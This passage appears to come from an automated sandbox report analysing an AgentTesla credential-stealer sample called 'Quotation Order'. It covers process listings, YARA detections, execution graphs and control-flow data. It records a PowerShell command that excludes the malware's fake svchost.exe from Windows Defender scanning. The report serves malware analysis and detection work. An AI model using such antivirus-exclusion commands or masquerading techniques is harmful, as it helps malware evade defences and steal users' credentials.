                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  Imagebase:0x7ff620390000
                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:52
                                                                                                                                                                                                                                                  Start time:10:07:35
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                                                                                                                                                                                                                  Imagebase:0x2dfb78c0000
                                                                                                                                                                                                                                                  File size:912'780 bytes
                                                                                                                                                                                                                                                  MD5 hash:D797AAE1EAF481E9C887482192B84109
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000034.00000002.1652420227.000002DFB9BBE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:53
                                                                                                                                                                                                                                                  Start time:10:07:35
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  Imagebase:0x7ff620390000
                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:54
                                                                                                                                                                                                                                                  Start time:10:07:37
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                                                                                                                                                                                                                                                  Imagebase:0x7ff7b2bb0000
                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:55
                                                                                                                                                                                                                                                  Start time:10:07:37
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  Imagebase:0x7ff620390000
                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:56
                                                                                                                                                                                                                                                  Start time:10:07:37
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                                                                                                                                                                                  Imagebase:0xb80000
                                                                                                                                                                                                                                                  File size:108'664 bytes
                                                                                                                                                                                                                                                  MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000038.00000002.2517527074.0000000003282000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000038.00000002.2517527074.0000000003282000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000038.00000002.2517527074.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000038.00000002.2517527074.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:57
                                                                                                                                                                                                                                                  Start time:10:07:37
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                                                                                                                                                                                  Imagebase:0xe10000
                                                                                                                                                                                                                                                  File size:108'664 bytes
                                                                                                                                                                                                                                                  MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:12.6%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                    Total number of Nodes:33
                                                                                                                                                                                                                                                    Total number of Limit Nodes:3
                                                                                                                                                                                                                                                    execution_graph 11251 7ff7c19c3b91 11253 7ff7c19c3bf2 11251->11253 11255 7ff7c19c3d3c 11253->11255 11256 7ff7c19c2608 11253->11256 11254 7ff7c19c3f55 11257 7ff7c19c2627 11256->11257 11258 7ff7c19c27ef 11257->11258 11259 7ff7c19c2930 LoadLibraryA 11257->11259 11258->11254 11260 7ff7c19c2984 11259->11260 11260->11254 11226 7ff7c19c2e84 11227 7ff7c19c2e8d 11226->11227 11238 7ff7c19c2780 11227->11238 11229 7ff7c19c2ed3 11243 7ff7c19c0618 11229->11243 11232 7ff7c19c2780 LoadLibraryA 11233 7ff7c19c2f09 11232->11233 11234 7ff7c19c0618 LoadLibraryA 11233->11234 11235 7ff7c19c2f2b 11234->11235 11236 7ff7c19c2780 LoadLibraryA 11235->11236 11237 7ff7c19c2f38 11236->11237 11240 7ff7c19c279b 11238->11240 11239 7ff7c19c27ef 11239->11229 11240->11239 11241 7ff7c19c2930 LoadLibraryA 11240->11241 11242 7ff7c19c2984 11241->11242 11242->11229 11244 7ff7c19c3000 11243->11244 11245 7ff7c19c2780 LoadLibraryA 11244->11245 11246 7ff7c19c2efc 11245->11246 11246->11232 11247 7ff7c19c2d84 11248 7ff7c19c2d8d VirtualProtect 11247->11248 11250 7ff7c19c2e51 11248->11250 11261 7ff7c19c0a58 11262 7ff7c19c0a61 FreeConsole 11261->11262 11264 7ff7c19c0afe 11262->11264

                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                    Function 00007FF7C19C2528 Relevance: 1.9, Strings: 1, Instructions: 676COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 510 7ff7c19c2528-7ff7c19c4ae1 call 7ff7c19c49a0 517 7ff7c19c4b04-7ff7c19c4b13 510->517 518 7ff7c19c4b15-7ff7c19c4b2f call 7ff7c19c49a0 call 7ff7c19c49f0 517->518 519 7ff7c19c4ae3-7ff7c19c4af9 call 7ff7c19c49a0 call 7ff7c19c49f0 517->519 528 7ff7c19c4b30-7ff7c19c4b80 519->528 529 7ff7c19c4afb-7ff7c19c4b02 519->529 533 7ff7c19c4b82-7ff7c19c4b87 call 7ff7c19c4148 528->533 534 7ff7c19c4b8c-7ff7c19c4bc3 528->534 529->517 533->534 536 7ff7c19c4dbf-7ff7c19c4e29 534->536 537 7ff7c19c4bc9-7ff7c19c4bd4 534->537 567 7ff7c19c4e46-7ff7c19c4e70 536->567 568 7ff7c19c4e2b-7ff7c19c4e31 536->568 538 7ff7c19c4bd6-7ff7c19c4be4 537->538 539 7ff7c19c4c48-7ff7c19c4c4d 537->539 538->536 541 7ff7c19c4bea-7ff7c19c4bf9 538->541 542 7ff7c19c4cc0-7ff7c19c4cca 539->542 543 7ff7c19c4c4f-7ff7c19c4c5b 539->543 547 7ff7c19c4c2d-7ff7c19c4c38 541->547 548 7ff7c19c4bfb-7ff7c19c4c2b 541->548 545 7ff7c19c4cec-7ff7c19c4cf4 542->545 546 7ff7c19c4ccc-7ff7c19c4cd9 call 7ff7c19c4168 542->546 543->536 549 7ff7c19c4c61-7ff7c19c4c74 543->549 550 7ff7c19c4cf7-7ff7c19c4d02 545->550 564 7ff7c19c4cde-7ff7c19c4cea 546->564 547->536 553 7ff7c19c4c3e-7ff7c19c4c46 547->553 548->547 552 7ff7c19c4c79-7ff7c19c4c7c 548->552 549->550 550->536 554 7ff7c19c4d08-7ff7c19c4d18 550->554 557 7ff7c19c4c92-7ff7c19c4c9a 552->557 558 7ff7c19c4c7e-7ff7c19c4c8e 552->558 553->538 553->539 554->536 560 7ff7c19c4d1e-7ff7c19c4d2b 554->560 557->536 559 7ff7c19c4ca0-7ff7c19c4cbf 557->559 558->557 560->536 562 7ff7c19c4d31-7ff7c19c4d51 560->562 562->536 572 7ff7c19c4d53-7ff7c19c4d62 562->572 564->545 570 7ff7c19c4e71-7ff7c19c4ec5 568->570 571 7ff7c19c4e33-7ff7c19c4e44 568->571 582 7ff7c19c4ed9-7ff7c19c4f11 570->582 583 7ff7c19c4ec7-7ff7c19c4ed7 570->583 571->567 571->568 574 7ff7c19c4d64-7ff7c19c4d6f 572->574 575 7ff7c19c4dad-7ff7c19c4dbe 572->575 574->575 581 7ff7c19c4d71-7ff7c19c4da8 call 7ff7c19c4168 574->581 581->575 587 7ff7c19c4f13-7ff7c19c4f19 582->587 588 7ff7c19c4f68-7ff7c19c4f6f 582->588 583->582 583->583 587->588 590 7ff7c19c4f1b-7ff7c19c4f1c 587->590 591 7ff7c19c4fb2-7ff7c19c4fdb 588->591 592 7ff7c19c4f71-7ff7c19c4f72 588->592 594 7ff7c19c4f1f-7ff7c19c4f22 590->594 595 7ff7c19c4f75-7ff7c19c4f78 592->595 598 7ff7c19c4f28-7ff7c19c4f35 594->598 599 7ff7c19c4fdc-7ff7c19c4ff1 594->599 595->599 600 7ff7c19c4f7a-7ff7c19c4f8b 595->600 603 7ff7c19c4f61-7ff7c19c4f66 598->603 604 7ff7c19c4f37-7ff7c19c4f5e 598->604 608 7ff7c19c4ff3-7ff7c19c4ffa 599->608 609 7ff7c19c4ffb-7ff7c19c500e 599->609 601 7ff7c19c4fa9-7ff7c19c4fb0 600->601 602 7ff7c19c4f8d-7ff7c19c4f93 600->602 601->591 601->595 602->599 605 7ff7c19c4f95-7ff7c19c4fa5 602->605 603->588 603->594 604->603 605->601 608->609
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1293568416.00007FF7C19C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19C0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7c19c0000_Quotation Order.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: d
                                                                                                                                                                                                                                                    • API String ID: 0-2564639436
                                                                                                                                                                                                                                                    • Opcode ID: 15054a772d197fdb6d634bed47e29a8b0f454132e64b3c30c205dae82c5c0352
                                                                                                                                                                                                                                                    • Instruction ID: 129fb726102c0bc8abd20cc3bbeb0b7508b1eb4cf1960e69439db143d10e62bb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15054a772d197fdb6d634bed47e29a8b0f454132e64b3c30c205dae82c5c0352
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43126A30A1CA8A4FE349EF2898955B1B7E1FF45328B5442BDD48EC7197DE24F842CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00007FF7C19C4600 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1293568416.00007FF7C19C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19C0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7c19c0000_Quotation Order.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: fish
                                                                                                                                                                                                                                                    • API String ID: 0-1064584243
                                                                                                                                                                                                                                                    • Opcode ID: 8bc72b9153288a7c572de2f509ee88dc29c02553963bfa8676b6e97764a5b7a9
                                                                                                                                                                                                                                                    • Instruction ID: 470803b735962489dd5160c8beca7916e11ebc693714af5dba99357b75441350
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8bc72b9153288a7c572de2f509ee88dc29c02553963bfa8676b6e97764a5b7a9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2CB15C31B1CA894FD75CBB3898655BAB7E1FF96324B44017ED08BC3193DE28A802C781
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00007FF7C19CEC99 Relevance: 1.6, Instructions: 1632COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 795 7ff7c19cec99-7ff7c19ced0e 798 7ff7c19ced7f-7ff7c19ced95 call 7ff7c19cb1f0 795->798 799 7ff7c19ced10-7ff7c19ced15 795->799 812 7ff7c19cedaf-7ff7c19cedba 798->812 813 7ff7c19ced97-7ff7c19cedaa 798->813 800 7ff7c19ced96-7ff7c19cedaa 799->800 801 7ff7c19ced17-7ff7c19ced31 call 7ff7c19c7890 799->801 803 7ff7c19cee48-7ff7c19cee4a 800->803 806 7ff7c19ceebb-7ff7c19ceebd 803->806 807 7ff7c19cee4c-7ff7c19cee51 803->807 811 7ff7c19ceed2 806->811 810 7ff7c19cee53-7ff7c19cee6f 807->810 807->811 816 7ff7c19ceed4-7ff7c19ceed5 811->816 817 7ff7c19ceed8-7ff7c19cef26 call 7ff7c19cb1f0 * 2 call 7ff7c19c74f0 811->817 814 7ff7c19cedd1-7ff7c19ceddc 812->814 815 7ff7c19cedbc-7ff7c19cedcf 812->815 813->803 819 7ff7c19cedf2-7ff7c19cee11 814->819 820 7ff7c19cedde-7ff7c19cedf0 814->820 815->803 816->817 829 7ff7c19cef2c-7ff7c19cef4a 817->829 830 7ff7c19cf0a9-7ff7c19cf103 817->830 819->803 822 7ff7c19cee13-7ff7c19cee44 819->822 820->803 822->803 829->830 831 7ff7c19cef50-7ff7c19cef6f 829->831 840 7ff7c19cf236-7ff7c19cf293 830->840 841 7ff7c19cf109-7ff7c19cf164 call 7ff7c19cb1f0 * 2 call 7ff7c19c74f0 830->841 834 7ff7c19ceff0-7ff7c19ceffa 831->834 835 7ff7c19cef71-7ff7c19cef90 831->835 837 7ff7c19ceffc-7ff7c19cefff 834->837 838 7ff7c19cf02e-7ff7c19cf07f call 7ff7c19cbbc0 834->838 843 7ff7c19cf001-7ff7c19cf016 835->843 844 7ff7c19cef92-7ff7c19cef97 835->844 837->838 838->830 851 7ff7c19cf081-7ff7c19cf0a8 838->851 853 7ff7c19cf34e-7ff7c19cf359 840->853 854 7ff7c19cf299-7ff7c19cf2ee call 7ff7c19cb1f0 * 2 call 7ff7c19c74f0 840->854 841->840 868 7ff7c19cf16a-7ff7c19cf1c0 841->868 847 7ff7c19cf018-7ff7c19cf029 843->847 844->847 849 7ff7c19cef99-7ff7c19cefe8 call 7ff7c19c7890 844->849 847->838 852 7ff7c19cf02b-7ff7c19cf02c 847->852 849->843 862 7ff7c19cefea-7ff7c19cefef 849->862 852->838 865 7ff7c19cf35b-7ff7c19cf35d 853->865 866 7ff7c19cf35e-7ff7c19cf37a 853->866 854->853 882 7ff7c19cf2f0-7ff7c19cf314 854->882 862->834 865->866 870 7ff7c19cf3c4-7ff7c19cf406 call 7ff7c19cb1f0 * 2 call 7ff7c19c74f0 866->870 871 7ff7c19cf37c-7ff7c19cf3a7 866->871 868->840 872 7ff7c19cf1c2-7ff7c19cf20d call 7ff7c19cbbc0 868->872 874 7ff7c19cf53b-7ff7c19cf56a 870->874 898 7ff7c19cf40c-7ff7c19cf42a 870->898 871->874 875 7ff7c19cf3ad-7ff7c19cf3c3 871->875 872->840 885 7ff7c19cf20f-7ff7c19cf235 872->885 891 7ff7c19cf5b4-7ff7c19cf5f3 call 7ff7c19cb1f0 * 2 call 7ff7c19c74f0 874->891 892 7ff7c19cf56c-7ff7c19cf597 874->892 875->870 886 7ff7c19cf316-7ff7c19cf326 882->886 887 7ff7c19cf342-7ff7c19cf34d 882->887 886->853 890 7ff7c19cf328-7ff7c19cf33f 886->890 890->887 895 7ff7c19cf6f7-7ff7c19cf729 891->895 921 7ff7c19cf5f9-7ff7c19cf614 891->921 894 7ff7c19cf59d-7ff7c19cf5b3 892->894 892->895 894->891 909 7ff7c19cf773-7ff7c19cf79c call 7ff7c19cb1f0 895->909 910 7ff7c19cf72b-7ff7c19cf756 895->910 898->874 900 7ff7c19cf430-7ff7c19cf44a 898->900 903 7ff7c19cf4a3-7ff7c19cf4a7 900->903 904 7ff7c19cf44c-7ff7c19cf44f 900->904 911 7ff7c19cf528-7ff7c19cf53a 903->911 912 7ff7c19cf4a9-7ff7c19cf4cf call 7ff7c19c7890 903->912 907 7ff7c19cf4d0-7ff7c19cf50f call 7ff7c19cbbc0 904->907 908 7ff7c19cf451-7ff7c19cf46a 904->908 928 7ff7c19cf511 907->928 914 7ff7c19cf483-7ff7c19cf494 908->914 915 7ff7c19cf46c-7ff7c19cf481 908->915 931 7ff7c19cf801-7ff7c19cf824 909->931 932 7ff7c19cf79e-7ff7c19cf7dd 909->932 916 7ff7c19cf825-7ff7c19cf837 910->916 917 7ff7c19cf75c-7ff7c19cf76f 910->917 912->907 922 7ff7c19cf498-7ff7c19cf4a0 914->922 915->922 939 7ff7c19cf879-7ff7c19cf887 916->939 940 7ff7c19cf839-7ff7c19cf849 916->940 917->909 926 7ff7c19cf616-7ff7c19cf619 921->926 927 7ff7c19cf66d-7ff7c19cf674 921->927 922->928 929 7ff7c19cf4a2 922->929 936 7ff7c19cf61b-7ff7c19cf639 926->936 937 7ff7c19cf69a-7ff7c19cf6a9 926->937 927->895 938 7ff7c19cf67a-7ff7c19cf697 927->938 928->874 935 7ff7c19cf513-7ff7c19cf526 928->935 929->903 931->916 945 7ff7c19cf84e-7ff7c19cf85a 932->945 948 7ff7c19cf7df-7ff7c19cf7e4 932->948 935->911 943 7ff7c19cf63b-7ff7c19cf640 936->943 944 7ff7c19cf6aa-7ff7c19cf6be call 7ff7c19cbbc0 936->944 937->944 938->937 941 7ff7c19cf9e3-7ff7c19cf9f9 939->941 942 7ff7c19cf88d-7ff7c19cf8a1 939->942 940->945 963 7ff7c19cf9fb-7ff7c19cfa0f 941->963 964 7ff7c19cf9fa 941->964 949 7ff7c19cf8a4-7ff7c19cf8df call 7ff7c19cb1f0 * 2 call 7ff7c19cd350 942->949 951 7ff7c19cf6c1-7ff7c19cf6cd 943->951 952 7ff7c19cf642-7ff7c19cf666 call 7ff7c19c7890 943->952 944->951 945->949 953 7ff7c19cf85c-7ff7c19cf863 945->953 954 7ff7c19cf865-7ff7c19cf876 948->954 956 7ff7c19cf7e6-7ff7c19cf800 call 7ff7c19c7890 948->956 981 7ff7c19cf8e1-7ff7c19cf8f7 949->981 982 7ff7c19cf8f9-7ff7c19cf904 949->982 951->895 957 7ff7c19cf6cf-7ff7c19cf6f6 951->957 952->927 953->954 954->939 969 7ff7c19cfa11-7ff7c19cfa49 963->969 964->963 971 7ff7c19cfa5f 969->971 972 7ff7c19cfa4b-7ff7c19cfa5d call 7ff7c19c0188 969->972 973 7ff7c19cfa64-7ff7c19cfa66 971->973 972->973 978 7ff7c19cfa68-7ff7c19cfa79 973->978 979 7ff7c19cfa7a-7ff7c19cfaf1 973->979 978->979 1001 7ff7c19cfaf7-7ff7c19cfb6f 979->1001 1002 7ff7c19cfbd8-7ff7c19cfbdf 979->1002 981->982 986 7ff7c19cf916 982->986 987 7ff7c19cf906-7ff7c19cf914 982->987 988 7ff7c19cf918-7ff7c19cf91d 986->988 987->988 990 7ff7c19cf91f-7ff7c19cf93e call 7ff7c19c2590 988->990 991 7ff7c19cf940-7ff7c19cf956 988->991 996 7ff7c19cf983-7ff7c19cf989 990->996 997 7ff7c19cf958-7ff7c19cf964 991->997 998 7ff7c19cf96a-7ff7c19cf97f call 7ff7c19cdd40 991->998 996->964 1003 7ff7c19cf98b-7ff7c19cf990 996->1003 997->998 998->996 1021 7ff7c19cfbcf-7ff7c19cfbd7 call 7ff7c19cfc24 1001->1021 1022 7ff7c19cfb71-7ff7c19cfb77 call 7ff7c19c9370 1001->1022 1006 7ff7c19cfbe1-7ff7c19cfbee 1002->1006 1007 7ff7c19cfbfc-7ff7c19cfc0c 1002->1007 1003->969 1005 7ff7c19cf992-7ff7c19cf9c0 call 7ff7c19c7890 call 7ff7c19c74f0 1003->1005 1005->941 1018 7ff7c19cf9c2-7ff7c19cf9e2 1005->1018 1006->1007 1008 7ff7c19cfbf0-7ff7c19cfbfa 1006->1008 1011 7ff7c19cfc12-7ff7c19cfc23 1007->1011 1008->1007 1021->1002 1025 7ff7c19cfb7c-7ff7c19cfbce 1022->1025 1025->1021
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1293568416.00007FF7C19C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19C0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7c19c0000_Quotation Order.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: a51194b8dc1925ee63eac621abbf37292a644a6057f2ff8e5b167bef5d520851
                                                                                                                                                                                                                                                    • Instruction ID: c289d0b8189c32b06e7c0595f5121e0818285f776520358e9beec3a8305df6a4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a51194b8dc1925ee63eac621abbf37292a644a6057f2ff8e5b167bef5d520851
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 07B2243060CB894FD719EF2884914B5B7E2FF85315B5446BEE4CAC72A6DE34E846CB81
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00007FF7C19CC111 Relevance: 1.5, Instructions: 1484COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1115 7ff7c19cc111-7ff7c19cc14b 1117 7ff7c19cc151-7ff7c19cc196 call 7ff7c19cb1f0 call 7ff7c19c74f0 1115->1117 1118 7ff7c19cc1dc-7ff7c19cc1ef 1115->1118 1117->1118 1131 7ff7c19cc198-7ff7c19cc1b6 1117->1131 1122 7ff7c19cc231-7ff7c19cc234 1118->1122 1123 7ff7c19cc1f1-7ff7c19cc209 1118->1123 1127 7ff7c19cc235-7ff7c19cc251 1122->1127 1128 7ff7c19cc2d6-7ff7c19cc2e7 1122->1128 1125 7ff7c19cc253-7ff7c19cc26a call 7ff7c19c74f0 call 7ff7c19c7c50 1123->1125 1126 7ff7c19cc20b-7ff7c19cc22f 1123->1126 1125->1128 1145 7ff7c19cc26c-7ff7c19cc27e 1125->1145 1126->1122 1127->1125 1135 7ff7c19cc329-7ff7c19cc336 1128->1135 1136 7ff7c19cc2e9-7ff7c19cc2f7 1128->1136 1131->1118 1134 7ff7c19cc1b8-7ff7c19cc1db 1131->1134 1140 7ff7c19cc3d3-7ff7c19cc3e1 1135->1140 1141 7ff7c19cc337-7ff7c19cc341 1135->1141 1138 7ff7c19cc2fa 1136->1138 1144 7ff7c19cc2fb-7ff7c19cc2fd 1138->1144 1151 7ff7c19cc3e3-7ff7c19cc3e5 1140->1151 1152 7ff7c19cc3e6-7ff7c19cc404 1140->1152 1142 7ff7c19cc343-7ff7c19cc344 1141->1142 1143 7ff7c19cc347-7ff7c19cc351 1141->1143 1142->1143 1146 7ff7c19cc353-7ff7c19cc375 call 7ff7c19cb1f0 1143->1146 1147 7ff7c19cc2ff-7ff7c19cc309 1144->1147 1148 7ff7c19cc2fe 1144->1148 1145->1138 1155 7ff7c19cc280 1145->1155 1146->1140 1161 7ff7c19cc377-7ff7c19cc389 1146->1161 1147->1146 1154 7ff7c19cc30b-7ff7c19cc30e 1147->1154 1148->1147 1151->1152 1167 7ff7c19cc405-7ff7c19cc409 1152->1167 1157 7ff7c19cc312-7ff7c19cc328 1154->1157 1158 7ff7c19cc2c6-7ff7c19cc2d5 1155->1158 1159 7ff7c19cc282-7ff7c19cc28a 1155->1159 1157->1135 1159->1144 1162 7ff7c19cc28c-7ff7c19cc291 1159->1162 1161->1167 1168 7ff7c19cc38b 1161->1168 1162->1157 1165 7ff7c19cc293-7ff7c19cc2b4 call 7ff7c19c7890 1162->1165 1165->1128 1174 7ff7c19cc2b6-7ff7c19cc2c4 1165->1174 1170 7ff7c19cc453-7ff7c19cc493 call 7ff7c19cb1f0 * 2 call 7ff7c19c74f0 1167->1170 1171 7ff7c19cc40b-7ff7c19cc436 1167->1171 1172 7ff7c19cc3d1-7ff7c19cc3d2 1168->1172 1173 7ff7c19cc38d-7ff7c19cc3ab call 7ff7c19c7890 1168->1173 1175 7ff7c19cc52c-7ff7c19cc53f 1170->1175 1198 7ff7c19cc499-7ff7c19cc4bd 1170->1198 1171->1175 1176 7ff7c19cc43c-7ff7c19cc450 1171->1176 1173->1140 1183 7ff7c19cc3ad-7ff7c19cc3d0 1173->1183 1174->1158 1184 7ff7c19cc581 1175->1184 1185 7ff7c19cc541-7ff7c19cc556 1175->1185 1176->1170 1183->1172 1189 7ff7c19cc582-7ff7c19cc589 1184->1189 1187 7ff7c19cc58b-7ff7c19cc58e 1185->1187 1188 7ff7c19cc558-7ff7c19cc56e 1185->1188 1192 7ff7c19cc590-7ff7c19cc5a0 1187->1192 1193 7ff7c19cc5a2-7ff7c19cc5ae 1187->1193 1188->1189 1195 7ff7c19cc570-7ff7c19cc580 1188->1195 1189->1187 1196 7ff7c19cc5be-7ff7c19cc5c7 1192->1196 1193->1196 1197 7ff7c19cc5b0-7ff7c19cc5bb 1193->1197 1195->1196 1200 7ff7c19cc638-7ff7c19cc645 1196->1200 1201 7ff7c19cc5c9-7ff7c19cc5cb 